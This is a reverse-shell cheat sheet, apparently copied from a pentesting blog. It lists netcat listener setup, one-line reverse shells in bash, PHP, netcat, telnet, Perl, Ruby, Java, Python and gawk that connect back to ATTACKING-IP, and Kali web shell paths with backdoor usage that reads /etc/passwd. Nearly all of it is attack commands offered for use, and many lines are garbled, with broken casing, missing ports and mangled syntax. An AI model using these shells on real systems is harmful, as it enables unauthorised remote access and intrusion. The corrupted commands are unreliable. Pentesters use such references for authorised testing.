Use Netcat to listen locally to an allowed legitimate port, such as 80/443
[email protected]:~# nc -nvlp 80
nc: listening on :: 80 ...
nc: listening on 0.0.0.0 80 ...
Note: If you are attacking a bouncing machine inside a NAT routing network, then you need to turn on port forwarding to access that network, such as the Port_forward module in Metasplioit
Bash Reverse Shells
exec /bin/bash 0&0 2>&0
0<&196;exec 196<>/dev/tcp/ATTACKING-IP/80; sh <&196 >&196 2>&196
exec 5<>/dev/tcp/ATTACKING-IP/80
cat <&5 | while read line; do $line 2>&5 >&5; done
# or:
while read line 0<&5; do $line 2>&5 >&5; done
bash -i >& /dev/tcp/ATTACKING-IP/80 0>&1
PHP Reverse Shell
Php-r ' $sock =fsockopen ("Attacking-ip"), exec ("/bin/sh-i <&3 >&3 2>&3"); ' (assumes TCP uses file descriptor 3.) If it doesn ' t work, try 4,5, or 6)
Netcat Reverse Shell
nc -e /bin/sh ATTACKING-IP 80
/bin/sh | nc ATTACKING-IP 80
rm -f /tmp/p; mknod /tmp/p p && nc ATTACKING-IP 4444 0/tmp/p
Telnet Reverse Shell
Rm-f/tmp/p; mknod/tmp/p p && telnet Attacking-ip 0/tmp/p
Telnet ATTACKING-IP 80 | /bin/bash | Telnet ATTACKING-IP 443
Perl Reverse Shell
Perl-e ' use Socket; $i = "Attacking-ip"; $p =80;socket (S,pf_inet,sock_stream,getprotobyname ("TCP")); if (Connect (S), Sockaddr_in ($p, Inet_aton ($i))) {Open (STDIN, ">&s"), open (STDOUT, ">&s"), open (STDERR, ">&s"); EXEC ("/bin/sh-i");}; '
Perl Windows Reverse Shell
Perl-mio-e ' $c =new io::socket::inet (peeraddr, "attacking-ip:80"); Stdin->fdopen ($c, R); $~->fdopen ($c, W); System$_ while<>; '
Perl-e ' use Socket; $i = "Attacking-ip"; $p =80;socket (S,pf_inet,sock_stream,getprotobyname ("TCP")); if (Connect (S), Sockaddr_in ($p, Inet_aton ($i))) {Open (STDIN, ">&s"), open (STDOUT, ">&s"), open (STDERR, ">&s"); EXEC ("/bin/sh-i");}; '
Ruby Reverse Shell
Ruby-rsocket-e ' F=tcpsocket.open ("Attacking-ip"). To_i;exec sprintf ("/bin/sh-i <&%d >&%d 2>& %d ", f,f,f) '
Java Reverse Shell
r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/ATTACKING-IP/80;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()
Python Reverse Shell
Python-c ' Import socket,subprocess,os;s=socket.socket (socket.af_inet,socket. SOCK_STREAM); S.connect (("Attacking-ip"); Os.dup2 (S.fileno (), 0); Os.dup2 (S.fileno (), 1); Os.dup2 (S.fileno (), 2);p =subprocess.call (["/bin/sh", "-I"]); '
Gawk Reverse Shell
#!/usr/bin/gawk -fBEGIN {
Port = 8080
Prompt = "bkd> "
Service = "/inet/tcp/" Port "/0/0"
while (1) {
do {
printf Prompt |& Service
Service |& getline cmd
if (cmd) {
while ((cmd |& getline) > 0)
print $0 |& Service
close(cmd)
}
} while (cmd != "exit")
close(Service)
}}
Kali Web Shells
Kali PHP Web Shells
/usr/share/webshells/php/php-reverse-shell.php |
Pen Test monkey-php Reverse Shell |
/usr/share/webshells/php/php-findsock-shell.php /usr/share/webshells/php/findsock.c |
Pen Test Monkey, Findsock Shell. Build gcc-o findsock findsock.c (be mindfull of the target servers architecture), execute with Netcat not a browser nc-v Target 80 |
/usr/share/webshells/php/simple-backdoor.php |
PHP Backdoor, usefull for CMD execution if Upload/code injection is possible, usage:http://target.com/simple-backdoor.php?cmd=cat+/etc/passwd |
/usr/share/webshells/php/php-backdoor.php |
Larger PHP Shell, with a text input box for command execution. |
Kali Perl Reverse Shell
/usr/share/webshells/perl/perl-reverse-shell.pl |
Pen Test Monkey-perl Reverse Shell |
/usr/share/webshells/perl/perlcmd.cgi |
Pen Test Monkey, Perl Shell. usage:http://target.com/perlcmd.cgi?cat/etc/passwd |
Kali Cold Fusion Shell
/usr/share/webshells/cfm/cfexec.cfm |
Cold Fusion Shell-aka CFM Shell |
Kali ASP Shell
/usr/share/webshells/asp/ |
Kali ASP Shells |
Kali ASPX Shells
/usr/share/webshells/aspx/ |
Kali ASPX Shells |
Kali JSP Reverse Shell
/usr/share/webshells/jsp/jsp-reverse.jsp |
Kali JSP Reverse Shell |
Original link Address: https://highon.coffee/blog/reverse-shell-cheat-sheet/
Some other articles about forwarding bounce summaries:
Penetration testing: Bounce and forward summary-Reverse Shell During the penetration test:http://le4f.net/post/post/ Reverse-shell-during-the-penetration-test
Two bloggers also have some good things on their blogs that can be useful for reading more.
Reverse Shell Cheat Sheet